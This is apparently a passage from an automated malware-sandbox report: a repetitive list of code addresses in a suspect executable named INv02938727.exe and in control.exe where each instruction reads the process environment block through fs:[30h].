Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012816E0 mov ecx, dword ptr fs:[00000030h]	2_2_012816E0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01328ED6 mov eax, dword ptr fs:[00000030h]	2_2_01328ED6
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012836CC mov eax, dword ptr fs:[00000030h]	2_2_012836CC
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01298EC7 mov eax, dword ptr fs:[00000030h]	2_2_01298EC7
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0130FEC0 mov eax, dword ptr fs:[00000030h]	2_2_0130FEC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16CF0 mov eax, dword ptr fs:[00000030h]	15_2_04E16CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16CF0 mov eax, dword ptr fs:[00000030h]	15_2_04E16CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16CF0 mov eax, dword ptr fs:[00000030h]	15_2_04E16CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E514FB mov eax, dword ptr fs:[00000030h]	15_2_04E514FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E68CD6 mov eax, dword ptr fs:[00000030h]	15_2_04E68CD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA849B mov eax, dword ptr fs:[00000030h]	15_2_04DA849B
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCA44B mov eax, dword ptr fs:[00000030h]	15_2_04DCA44B
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2C450 mov eax, dword ptr fs:[00000030h]	15_2_04E2C450
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2C450 mov eax, dword ptr fs:[00000030h]	15_2_04E2C450
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB746D mov eax, dword ptr fs:[00000030h]	15_2_04DB746D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51C06 mov eax, dword ptr fs:[00000030h]	15_2_04E51C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E6740D mov eax, dword ptr fs:[00000030h]	15_2_04E6740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E6740D mov eax, dword ptr fs:[00000030h]	15_2_04E6740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E6740D mov eax, dword ptr fs:[00000030h]	15_2_04E6740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16C0A mov eax, dword ptr fs:[00000030h]	15_2_04E16C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16C0A mov eax, dword ptr fs:[00000030h]	15_2_04E16C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16C0A mov eax, dword ptr fs:[00000030h]	15_2_04E16C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16C0A mov eax, dword ptr fs:[00000030h]	15_2_04E16C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCBC2C mov eax, dword ptr fs:[00000030h]	15_2_04DCBC2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5FDE2 mov eax, dword ptr fs:[00000030h]	15_2_04E5FDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5FDE2 mov eax, dword ptr fs:[00000030h]	15_2_04E5FDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5FDE2 mov eax, dword ptr fs:[00000030h]	15_2_04E5FDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5FDE2 mov eax, dword ptr fs:[00000030h]	15_2_04E5FDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E48DF1 mov eax, dword ptr fs:[00000030h]	15_2_04E48DF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]	15_2_04E16DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]	15_2_04E16DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]	15_2_04E16DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16DC9 mov ecx, dword ptr fs:[00000030h]	15_2_04E16DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]	15_2_04E16DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E16DC9 mov eax, dword ptr fs:[00000030h]	15_2_04E16DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAD5E0 mov eax, dword ptr fs:[00000030h]	15_2_04DAD5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAD5E0 mov eax, dword ptr fs:[00000030h]	15_2_04DAD5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCFD9B mov eax, dword ptr fs:[00000030h]	15_2_04DCFD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCFD9B mov eax, dword ptr fs:[00000030h]	15_2_04DCFD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E605AC mov eax, dword ptr fs:[00000030h]	15_2_04E605AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E605AC mov eax, dword ptr fs:[00000030h]	15_2_04E605AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]	15_2_04D92D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]	15_2_04D92D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]	15_2_04D92D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]	15_2_04D92D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D92D8A mov eax, dword ptr fs:[00000030h]	15_2_04D92D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC2581 mov eax, dword ptr fs:[00000030h]	15_2_04DC2581
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC2581 mov eax, dword ptr fs:[00000030h]	15_2_04DC2581
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC2581 mov eax, dword ptr fs:[00000030h]	15_2_04DC2581
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC2581 mov eax, dword ptr fs:[00000030h]	15_2_04DC2581
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC1DB5 mov eax, dword ptr fs:[00000030h]	15_2_04DC1DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC1DB5 mov eax, dword ptr fs:[00000030h]	15_2_04DC1DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC1DB5 mov eax, dword ptr fs:[00000030h]	15_2_04DC1DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC35A1 mov eax, dword ptr fs:[00000030h]	15_2_04DC35A1
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB7D50 mov eax, dword ptr fs:[00000030h]	15_2_04DB7D50
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD3D43 mov eax, dword ptr fs:[00000030h]	15_2_04DD3D43
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E13540 mov eax, dword ptr fs:[00000030h]	15_2_04E13540
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBC577 mov eax, dword ptr fs:[00000030h]	15_2_04DBC577
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBC577 mov eax, dword ptr fs:[00000030h]	15_2_04DBC577
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E68D34 mov eax, dword ptr fs:[00000030h]	15_2_04E68D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E1A537 mov eax, dword ptr fs:[00000030h]	15_2_04E1A537
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5E539 mov eax, dword ptr fs:[00000030h]	15_2_04E5E539
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC4D3B mov eax, dword ptr fs:[00000030h]	15_2_04DC4D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC4D3B mov eax, dword ptr fs:[00000030h]	15_2_04DC4D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC4D3B mov eax, dword ptr fs:[00000030h]	15_2_04DC4D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9AD30 mov eax, dword ptr fs:[00000030h]	15_2_04D9AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04DA3D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC36CC mov eax, dword ptr fs:[00000030h]	15_2_04DC36CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD8EC7 mov eax, dword ptr fs:[00000030h]	15_2_04DD8EC7
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E4FEC0 mov eax, dword ptr fs:[00000030h]	15_2_04E4FEC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E68ED6 mov eax, dword ptr fs:[00000030h]	15_2_04E68ED6
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA76E2 mov eax, dword ptr fs:[00000030h]	15_2_04DA76E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC16E0 mov ecx, dword ptr fs:[00000030h]	15_2_04DC16E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E60EA5 mov eax, dword ptr fs:[00000030h]	15_2_04E60EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E60EA5 mov eax, dword ptr fs:[00000030h]	15_2_04E60EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E60EA5 mov eax, dword ptr fs:[00000030h]	15_2_04E60EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E146A7 mov eax, dword ptr fs:[00000030h]	15_2_04E146A7
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2FE87 mov eax, dword ptr fs:[00000030h]	15_2_04E2FE87
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04DA7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04DA7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04DA7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04DA7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04DA7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04DA7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5AE44 mov eax, dword ptr fs:[00000030h]	15_2_04E5AE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E5AE44 mov eax, dword ptr fs:[00000030h]	15_2_04E5AE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04DBAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04DBAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04DBAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04DBAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04DBAE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA766D mov eax, dword ptr fs:[00000030h]	15_2_04DA766D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCA61C mov eax, dword ptr fs:[00000030h]	15_2_04DCA61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCA61C mov eax, dword ptr fs:[00000030h]	15_2_04DCA61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9C600 mov eax, dword ptr fs:[00000030h]	15_2_04D9C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9C600 mov eax, dword ptr fs:[00000030h]	15_2_04D9C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9C600 mov eax, dword ptr fs:[00000030h]	15_2_04D9C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E4FE3F mov eax, dword ptr fs:[00000030h]	15_2_04E4FE3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC8E00 mov eax, dword ptr fs:[00000030h]	15_2_04DC8E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E51608 mov eax, dword ptr fs:[00000030h]	15_2_04E51608
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9E620 mov eax, dword ptr fs:[00000030h]	15_2_04D9E620
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD37F5 mov eax, dword ptr fs:[00000030h]	15_2_04DD37F5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DA8794 mov eax, dword ptr fs:[00000030h]	15_2_04DA8794
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E17794 mov eax, dword ptr fs:[00000030h]	15_2_04E17794
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E17794 mov eax, dword ptr fs:[00000030h]	15_2_04E17794
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E17794 mov eax, dword ptr fs:[00000030h]	15_2_04E17794
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E68F6A mov eax, dword ptr fs:[00000030h]	15_2_04E68F6A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAEF40 mov eax, dword ptr fs:[00000030h]	15_2_04DAEF40
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAFF60 mov eax, dword ptr fs:[00000030h]	15_2_04DAFF60
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBF716 mov eax, dword ptr fs:[00000030h]	15_2_04DBF716
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCA70E mov eax, dword ptr fs:[00000030h]	15_2_04DCA70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCA70E mov eax, dword ptr fs:[00000030h]	15_2_04DCA70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E6070D mov eax, dword ptr fs:[00000030h]	15_2_04E6070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E6070D mov eax, dword ptr fs:[00000030h]	15_2_04E6070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCE730 mov eax, dword ptr fs:[00000030h]	15_2_04DCE730
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2FF10 mov eax, dword ptr fs:[00000030h]	15_2_04E2FF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2FF10 mov eax, dword ptr fs:[00000030h]	15_2_04E2FF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D94F2E mov eax, dword ptr fs:[00000030h]	15_2_04D94F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D94F2E mov eax, dword ptr fs:[00000030h]	15_2_04D94F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]	15_2_04E2B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2B8D0 mov ecx, dword ptr fs:[00000030h]	15_2_04E2B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]	15_2_04E2B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]	15_2_04E2B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]	15_2_04E2B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E2B8D0 mov eax, dword ptr fs:[00000030h]	15_2_04E2B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D958EC mov eax, dword ptr fs:[00000030h]	15_2_04D958EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D99080 mov eax, dword ptr fs:[00000030h]	15_2_04D99080
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCF0BF mov ecx, dword ptr fs:[00000030h]	15_2_04DCF0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCF0BF mov eax, dword ptr fs:[00000030h]	15_2_04DCF0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCF0BF mov eax, dword ptr fs:[00000030h]	15_2_04DCF0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E13884 mov eax, dword ptr fs:[00000030h]	15_2_04E13884
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E13884 mov eax, dword ptr fs:[00000030h]	15_2_04E13884
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD90AF mov eax, dword ptr fs:[00000030h]	15_2_04DD90AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04DC20A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04DC20A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04DC20A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04DC20A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04DC20A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04DC20A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB0050 mov eax, dword ptr fs:[00000030h]	15_2_04DB0050
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB0050 mov eax, dword ptr fs:[00000030h]	15_2_04DB0050
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E61074 mov eax, dword ptr fs:[00000030h]	15_2_04E61074
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E52073 mov eax, dword ptr fs:[00000030h]	15_2_04E52073
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAB02A mov eax, dword ptr fs:[00000030h]	15_2_04DAB02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAB02A mov eax, dword ptr fs:[00000030h]	15_2_04DAB02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAB02A mov eax, dword ptr fs:[00000030h]	15_2_04DAB02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAB02A mov eax, dword ptr fs:[00000030h]	15_2_04DAB02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]	15_2_04DC002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]	15_2_04DC002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]	15_2_04DC002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]	15_2_04DC002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC002D mov eax, dword ptr fs:[00000030h]	15_2_04DC002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E64015 mov eax, dword ptr fs:[00000030h]	15_2_04E64015
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E64015 mov eax, dword ptr fs:[00000030h]	15_2_04E64015
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E17016 mov eax, dword ptr fs:[00000030h]	15_2_04E17016
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E17016 mov eax, dword ptr fs:[00000030h]	15_2_04E17016
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E17016 mov eax, dword ptr fs:[00000030h]	15_2_04E17016
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E241E8 mov eax, dword ptr fs:[00000030h]	15_2_04E241E8
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9B1E1 mov eax, dword ptr fs:[00000030h]	15_2_04D9B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9B1E1 mov eax, dword ptr fs:[00000030h]	15_2_04D9B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9B1E1 mov eax, dword ptr fs:[00000030h]	15_2_04D9B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E169A6 mov eax, dword ptr fs:[00000030h]	15_2_04E169A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC2990 mov eax, dword ptr fs:[00000030h]	15_2_04DC2990
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBC182 mov eax, dword ptr fs:[00000030h]	15_2_04DBC182
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCA185 mov eax, dword ptr fs:[00000030h]	15_2_04DCA185
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E151BE mov eax, dword ptr fs:[00000030h]	15_2_04E151BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E151BE mov eax, dword ptr fs:[00000030h]	15_2_04E151BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E151BE mov eax, dword ptr fs:[00000030h]	15_2_04E151BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E151BE mov eax, dword ptr fs:[00000030h]	15_2_04E151BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC61A0 mov eax, dword ptr fs:[00000030h]	15_2_04DC61A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC61A0 mov eax, dword ptr fs:[00000030h]	15_2_04DC61A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBB944 mov eax, dword ptr fs:[00000030h]	15_2_04DBB944
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DBB944 mov eax, dword ptr fs:[00000030h]	15_2_04DBB944
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9B171 mov eax, dword ptr fs:[00000030h]	15_2_04D9B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9B171 mov eax, dword ptr fs:[00000030h]	15_2_04D9B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D9C962 mov eax, dword ptr fs:[00000030h]	15_2_04D9C962
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D99100 mov eax, dword ptr fs:[00000030h]	15_2_04D99100
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D99100 mov eax, dword ptr fs:[00000030h]	15_2_04D99100
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D99100 mov eax, dword ptr fs:[00000030h]	15_2_04D99100
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC513A mov eax, dword ptr fs:[00000030h]	15_2_04DC513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC513A mov eax, dword ptr fs:[00000030h]	15_2_04DC513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB4120 mov eax, dword ptr fs:[00000030h]	15_2_04DB4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB4120 mov eax, dword ptr fs:[00000030h]	15_2_04DB4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB4120 mov eax, dword ptr fs:[00000030h]	15_2_04DB4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB4120 mov eax, dword ptr fs:[00000030h]	15_2_04DB4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DB4120 mov ecx, dword ptr fs:[00000030h]	15_2_04DB4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC2ACB mov eax, dword ptr fs:[00000030h]	15_2_04DC2ACB
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DC2AE4 mov eax, dword ptr fs:[00000030h]	15_2_04DC2AE4
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCD294 mov eax, dword ptr fs:[00000030h]	15_2_04DCD294
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCD294 mov eax, dword ptr fs:[00000030h]	15_2_04DCD294
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAAAB0 mov eax, dword ptr fs:[00000030h]	15_2_04DAAAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DAAAB0 mov eax, dword ptr fs:[00000030h]	15_2_04DAAAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DCFAB0 mov eax, dword ptr fs:[00000030h]	15_2_04DCFAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]	15_2_04D952A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]	15_2_04D952A5
